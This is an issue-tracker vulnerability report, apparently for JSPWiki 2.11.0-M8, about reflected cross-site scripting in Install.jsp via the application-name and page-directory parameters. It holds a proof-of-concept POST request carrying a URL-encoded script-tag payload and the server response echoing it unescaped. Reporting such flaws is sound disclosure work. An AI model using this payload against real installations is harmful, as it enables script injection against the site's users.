Details
-
Task
-
Status: Resolved
-
Major
-
Resolution: Duplicate
-
2.11.0-M8
-
None
-
Windows new version
Firefox version 84.0.1
Description
In function install.jsp exist multi xss in parameter jspwiki.applicationName, jspwiki.fileSystemProvider.pageDir , jspwiki.workDir. parameter not sanitize via method getContentEncoding().
- Request :
// POST /wiki_jsp_war/Install.jsp HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 248 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/wiki_jsp_war/Install.jsp Cookie: JSESSIONID=079AB09DC4350BB216A468B15DC9F8BA; XDEBUG_SESSION=XDEBUG_ECLIPSE Upgrade-Insecure-Requests: 1jspwiki.applicationName=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.fileSystemProvider.pageDir=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.workDir=F%3A%5C%5CExtension%5C%5Capache-tomcat-8.5.60%5C%5Ctemp&submit=Configure%21
- Response:
// HTTP/1.1 200 Pragma: no-cache Expires: -1 Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Wed, 23 Dec 2020 10:33:46 GMT Connection: close Content-Length: 4403<?xml version="1.0" encoding="UTF-8"?> ... </div><div class="formcontainer"><form action="Install.jsp" method="post"> <!-- Page directory --> <h3>Basics</h3> <label class="control-label" >Application Name<input class="form-control" type="text" name="jspwiki.applicationName" size="20" value="'"><script>alert(1)</script>"/> </label> <div class="help-block"> What should your wiki be called? Try to use a relative short name.</div> <label class="control-label" >Page storage<input class="form-control" type="text" name="jspwiki.fileSystemProvider.pageDir" size="40" value="'"><script>alert(1)</script>"/> </label> <div class="help-block"> By default, JSPWiki will use the VersioningFileProvider that stores files in a directory. If you specify a directory that does not exist, JSPWiki will try to create it for you. All attachments will also be put in the same directory.</div> <h3>Security</h3> <label class="control-label" >Administrator account</label> <p>Enabled</p> <div class="description"> This wiki has an administrator account named <strong>admin</strong> that is part of the wiki group <strong>Admin</strong>. By default, JSPWiki's security policy grants all members of the Admin group the all-powerful <code>AllPermission</code>.</div> <h3>Advanced Settings</h3> <label class="control-label" >Work directory<input class="form-control" type="text" name="jspwiki.workDir" size="40" value="F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp"/> </label> <div class="help-block"> This is the place where all caches and other runtime stuff is stored.</div> <p class="help-block"> After you click <em>Configure!</em>, the installer will write your settings to <code>F:\Extension\apache-tomcat-8.5.60\temp\jspwiki-custom.properties</code>. It will also create an Administrator account with a random password and a corresponding Admin group.</p> <input class="btn btn-primary" type="submit" name="submit" value="Configure!" /></form></div><hr /> <h3>Here is your new jspwiki-custom.properties</h3> <pre>jspwiki.applicationName = '"><script>alert(1)</script> jspwiki.fileSystemProvider.pageDir = '"><script>alert(1)</script> jspwiki.workDir = F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp jspwiki.basicAttachmentProvider.storageDir = '"><script>alert(1)</script> jspwiki.pageProvider = VersioningFileProvider </pre> <!-- We're done... --> </div> </div> </div> </body> </html>
Attachments
Attachments
Issue Links
- relates to
-
JSPWIKI-1172 jspwiki.workDir default should be in $javax.servlet.context.tempdir
-
- Closed
-
- links to